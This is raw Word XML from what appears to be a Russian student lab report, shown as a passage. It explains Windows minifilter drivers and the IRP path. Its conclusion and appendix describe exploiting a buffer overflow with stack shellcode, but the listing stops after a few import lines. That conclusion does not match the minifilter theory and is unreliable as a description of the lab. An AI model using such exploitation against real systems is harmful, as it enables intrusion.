        <w:t xml:space="preserve">другие </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t>минифильтры</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A95B4E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5CD7D9" w14:textId="40772B75" w:rsidR="00897378" w:rsidRPr="00897378" w:rsidRDefault="00897378" w:rsidP="00897378">
      <w:r w:rsidRPr="00897378">
        <w:t xml:space="preserve">Каждому классу </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00897378">
        <w:t>минифильтров</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00897378">
        <w:t xml:space="preserve"> присваивается строго определенный приоритет (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00897378">
        <w:t>Altitude</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00897378">
        <w:t xml:space="preserve">). Например, антивирусы имеют высоту </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00897378">
        <w:t>320000-329999</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00897378">
        <w:t xml:space="preserve">, а шифровальщики </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00897378">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00897378">
        <w:t>140000-149999</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00897378">
        <w:t>. Диспетчер фильтров гарантирует, что</w:t>
      </w:r>
      <w:r>
        <w:t>, например,</w:t>
      </w:r>
      <w:r w:rsidRPr="00897378">
        <w:t xml:space="preserve"> пакет IRP_MJ_CREATE сначала посмотрит антивирус, и только потом он дойдет до шифровальщика. Конфликты исключены.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD1460C" w14:textId="745A0CA4" w:rsidR="00897378" w:rsidRPr="00897378" w:rsidRDefault="00897378" w:rsidP="00897378">
      <w:r w:rsidRPr="00897378">
        <w:t>Избирательная фильтрация: драйвер перехватывает только те операции, на которые он подписался. В Legacy-драйверах приходилось пропускать через себя абсолютно весь трафик, что сильно "съедало" производительность диска.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20790644" w14:textId="77777777" w:rsidR="00897378" w:rsidRPr="00897378" w:rsidRDefault="00897378" w:rsidP="00897378">
      <w:r w:rsidRPr="00897378">
        <w:t xml:space="preserve">Контексты и безопасность: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00897378">
        <w:t>FltMgr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00897378">
        <w:t xml:space="preserve"> берет на себя рутину по управлению памятью и синхронизации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF21241" w14:textId="77777777" w:rsidR="00897378" w:rsidRPr="00897378" w:rsidRDefault="00897378" w:rsidP="00897378">
      <w:r w:rsidRPr="00897378">
        <w:t xml:space="preserve">Динамическая выгрузка: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00897378">
        <w:t>Минифильтр</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00897378">
        <w:t xml:space="preserve"> можно выгрузить на лету (через команду </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00897378">
        <w:t>fltmc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00897378">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00897378">
        <w:t>unload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00897378">
        <w:t>), что невероятно упрощает процесс отладки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C42A58E" w14:textId="77777777" w:rsidR="00A95B4E" w:rsidRDefault="00A95B4E" w:rsidP="00A95B4E"/>
    <w:p w14:paraId="0CADCB81" w14:textId="124DC79F" w:rsidR="00A45FA1" w:rsidRDefault="00A45FA1" w:rsidP="00A45FA1">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IRP (I/O Request Packet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE7D73A" w14:textId="0F1D64C4" w:rsidR="00A45FA1" w:rsidRDefault="00A45FA1" w:rsidP="00A45FA1">
      <w:r>
        <w:t xml:space="preserve">Драйвера в ОС </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>общаются через пакеты запросов ввода вывода (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IRP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve">Когда программа хочет что-то сделать с железом (прочитать файл, отправить пакет по сети, нажать клавишу), система создает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IRP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>, кладет в него параметры запроса и отправляет его вниз по цепочке (стеку) драйверов.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666482F9" w14:textId="4CC66398" w:rsidR="00A45FA1" w:rsidRDefault="00A45FA1" w:rsidP="00A45FA1">
      <w:r>
        <w:t>Жизненный цикл можно представить следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631244A7" w14:textId="3B74179A" w:rsidR="00A45FA1" w:rsidRPr="00A45FA1" w:rsidRDefault="00A45FA1" w:rsidP="00A45FA1">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mode</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Вызов стандартной функции из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Например, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CreateFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC9FAFB" w14:textId="5C5F8D84" w:rsidR="00A45FA1" w:rsidRDefault="00A45FA1" w:rsidP="00A45FA1">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Переход в ядро. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve">Подсистема Windows переводит этот вызов в низкоуровневую функцию </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>NtCreateFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve">) из библиотеки ntdll.dll, которая выполняет системный вызов </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>syscall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve"> и переключает процессор в привилегированный режим работы ядра (Ring 0).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B94500" w14:textId="3ED81E38" w:rsidR="00A45FA1" w:rsidRDefault="00A45FA1" w:rsidP="00A45FA1">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>I/O Manager</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>Вызов принимает Диспетчер ввода-вывода ядра. Он проверяет базовые параметры, выделяет память из невыгружаемого пула (Non-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>paged</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>pool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>) и формирует структуру IRP.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621272F2" w14:textId="729A6E11" w:rsidR="00A45FA1" w:rsidRDefault="00A45FA1" w:rsidP="00E12405">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>Маршрутизация</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>Диспетчер отправляет IRP на вершину стека файловой системы, где его первым делом перехватывает Filter Manager (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>FltMgr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:t>который в свою очередь раздает этот запрос поочередно драйверам.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E89BA5D" w14:textId="77777777" w:rsidR="00A45FA1" w:rsidRDefault="00A45FA1" w:rsidP="00A45FA1">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4059D97F" w14:textId="77777777" w:rsidR="00A45FA1" w:rsidRPr="00A45FA1" w:rsidRDefault="00A45FA1" w:rsidP="00A45FA1">
      <w:r w:rsidRPr="00A45FA1">
        <w:t>Каждый пакет состоит из двух главных частей, которые мы активно использовали в коде:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F9B6E6" w14:textId="77777777" w:rsidR="00A45FA1" w:rsidRPr="00A45FA1" w:rsidRDefault="00A45FA1" w:rsidP="00D30FBD">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>Заголовок (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>Header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>: Содержит</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve"> общую информацию о запросе. Кто послал (Process ID, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>Thread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve"> ID), адрес буфера памяти и статус выполнения (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>IoStatus.Status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>). Именно туда мы писали наш STATUS_ACCESS_DENIED.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EA869E" w14:textId="4917DAB7" w:rsidR="00A45FA1" w:rsidRPr="00A45FA1" w:rsidRDefault="00A45FA1" w:rsidP="00D30FBD">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve">Стековые локации (I/O </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>Locations</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D30FBD">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve"> IO_STACK_LOCATION)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>: Так</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve"> как пакет проходит через несколько драйверов, для каждого драйвера внутри пакета есть своя «ячейка» с параметрами. В этой ячейке хранится </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>MajorFunction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve"> (Главный код операции).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073B5F47" w14:textId="3137822E" w:rsidR="00A45FA1" w:rsidRPr="00A45FA1" w:rsidRDefault="00A45FA1" w:rsidP="00A45FA1">
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve">Например, если программа открывает файл </w:t>
      </w:r>
      <w:r w:rsidR="00D30FBD">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve"> код равен IRP_MJ_CREATE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC2CE49" w14:textId="169DF0F5" w:rsidR="00A45FA1" w:rsidRPr="00A45FA1" w:rsidRDefault="00A45FA1" w:rsidP="00A45FA1">
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve">Если читает </w:t>
      </w:r>
      <w:r w:rsidR="00D30FBD">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve"> IRP_MJ_READ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B706F6E" w14:textId="40561775" w:rsidR="00A45FA1" w:rsidRPr="00A45FA1" w:rsidRDefault="00A45FA1" w:rsidP="00A45FA1">
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve">Если пишет </w:t>
      </w:r>
      <w:r w:rsidR="00D30FBD">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45FA1">
        <w:t xml:space="preserve"> IRP_MJ_WRITE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC38AF7" w14:textId="68F22E62" w:rsidR="00A45FA1" w:rsidRPr="00A45FA1" w:rsidRDefault="00A45FA1" w:rsidP="00A45FA1">
      <w:r w:rsidRPr="00A45FA1">
        <w:t>В этой же ячейке лежат специфические параметры, например, запрашиваемые права (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>DesiredAccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A45FA1">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00D30FBD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE973FE" w14:textId="77777777" w:rsidR="00A45FA1" w:rsidRDefault="00A45FA1" w:rsidP="00A45FA1">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E955A53" w14:textId="77777777" w:rsidR="00D30FBD" w:rsidRPr="00D30FBD" w:rsidRDefault="00D30FBD" w:rsidP="00D30FBD">
      <w:r w:rsidRPr="00D30FBD">
        <w:t xml:space="preserve">В </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D30FBD">
        <w:t>минифильтрах</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D30FBD">
        <w:t xml:space="preserve"> нам не нужно вручную ловить летящие пакеты. Мы объявляем о своих намерениях на этапе инициализации драйвера (в функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D30FBD">
        <w:t>DriverEntry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D30FBD">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B6DAA7" w14:textId="3727A478" w:rsidR="00D30FBD" w:rsidRPr="00D30FBD" w:rsidRDefault="00D30FBD" w:rsidP="00D30FBD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D30FBD">
        <w:lastRenderedPageBreak/>
        <w:t>Для этого используется структура FLT_REGISTRATION. Внутри</w:t>
      </w:r>
      <w:r w:rsidRPr="00D30FBD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D30FBD">
        <w:t>нее</w:t>
      </w:r>
      <w:r w:rsidRPr="00D30FBD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D30FBD">
        <w:t>передаем</w:t>
      </w:r>
      <w:r w:rsidRPr="00D30FBD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D30FBD">
        <w:t>массив</w:t>
      </w:r>
      <w:r w:rsidRPr="00D30FBD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Callbacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00D30FBD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00D30FBD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLT_OPERATION_REGISTRATION.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B17F810" w14:textId="77777777" w:rsidR="00D30FBD" w:rsidRPr="00D30FBD" w:rsidRDefault="00D30FBD" w:rsidP="00D30FBD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F41BDE3" w14:textId="72E0DA67" w:rsidR="00D30FBD" w:rsidRPr="00D30FBD" w:rsidRDefault="00D30FBD" w:rsidP="00D30FBD">
      <w:r>
        <w:t xml:space="preserve">Когда один из драйверов получает пакет, он обязан после его </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>обрабокти</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> вернуть статус: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D30FBD">
        <w:t>FLT_PREOP_SUCCESS_WITH_CALLBACK / FLT_PREOP_SUCCESS_NO_CALLBACK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – пакет летит дальше по стеку драйверов, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D30FBD">
        <w:t>FLT_PREOP_COMPLETE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – возвращение к пользователю, пакет не попадет к другим драйверам</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D5499A" w14:textId="77777777" w:rsidR="00D30FBD" w:rsidRPr="00D30FBD" w:rsidRDefault="00D30FBD" w:rsidP="00A45FA1">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06926ACC" w14:textId="77777777" w:rsidR="00A45FA1" w:rsidRPr="00D30FBD" w:rsidRDefault="00A45FA1" w:rsidP="00A45FA1">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37F5248F" w14:textId="6313B84E" w:rsidR="000848C7" w:rsidRPr="00D30FBD" w:rsidRDefault="000848C7" w:rsidP="00A45FA1">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D30FBD">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51422811" w14:textId="1B030995" w:rsidR="000848C7" w:rsidRDefault="00437BF0" w:rsidP="00437BF0">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Практическая часть</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51476A9D" w14:textId="77777777" w:rsidR="00897378" w:rsidRDefault="00897378" w:rsidP="00897378"/>
    <w:p w14:paraId="7D10A785" w14:textId="77777777" w:rsidR="00897378" w:rsidRDefault="00897378" w:rsidP="00897378"/>
    <w:p w14:paraId="6E00498C" w14:textId="1C1282B0" w:rsidR="00897378" w:rsidRDefault="00897378">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2C6A0A" w14:textId="77777777" w:rsidR="00897378" w:rsidRPr="00897378" w:rsidRDefault="00897378" w:rsidP="00897378"/>
    <w:p w14:paraId="456AB332" w14:textId="1EE07BAC" w:rsidR="009E0F43" w:rsidRPr="006426CC" w:rsidRDefault="002777C3" w:rsidP="006426CC">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="006426CC">
        <w:t>Вывод</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7AB0CF" w14:textId="28BE3D07" w:rsidR="0035662C" w:rsidRPr="00A87CF9" w:rsidRDefault="0035662C" w:rsidP="00A87CF9">
      <w:pPr>
        <w:pStyle w:val="aff8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В ходе выполнения лабораторной работы </w:t>
      </w:r>
      <w:r w:rsidR="00A87CF9">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">были получены </w:t>
      </w:r>
      <w:r w:rsidR="00A87CF9" w:rsidRPr="00A87CF9">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>практические навыки эксплуатации уязвимости переполнения буфера,</w:t>
      </w:r>
      <w:r w:rsidR="00A87CF9">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A87CF9" w:rsidRPr="00A87CF9">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>передача адреса возврата по указанному адресу и выполнен код, встроенный в</w:t>
      </w:r>
      <w:r w:rsidR="00A87CF9">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A87CF9" w:rsidRPr="00A87CF9">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>стек программы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1421DA" w14:textId="2C6D04DF" w:rsidR="00457D40" w:rsidRPr="00051312" w:rsidRDefault="00457D40" w:rsidP="00457D40">
      <w:pPr>
        <w:pStyle w:val="afff4"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52EDF02E" w14:textId="45121667" w:rsidR="005F731C" w:rsidRPr="00457D40" w:rsidRDefault="005F731C" w:rsidP="00457D40">
      <w:pPr>
        <w:pStyle w:val="afff4"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="573066B6" w14:textId="10A4436E" w:rsidR="00A67FDB" w:rsidRDefault="000A7974" w:rsidP="00656D19">
      <w:pPr>
        <w:pStyle w:val="affff1"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Приложение </w:t>
      </w:r>
      <w:r w:rsidR="00656D19">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>А</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D85821" w14:textId="771975AE" w:rsidR="00C52126" w:rsidRDefault="00803F25" w:rsidP="00803F25">
      <w:pPr>
        <w:pStyle w:val="affffd"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Листинг программы «Создание конфигурационного файла с шелл-кодом»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2126" w14:paraId="376A875E" w14:textId="77777777" w:rsidTr="00C52126">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5616FDC9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import </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>struct</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="4B12DA24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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>os</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="2D4773EA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>import subprocess</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2936B3DF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</w:p>
          <w:p w14:paraId="329F4003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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00401C70">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>asm_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
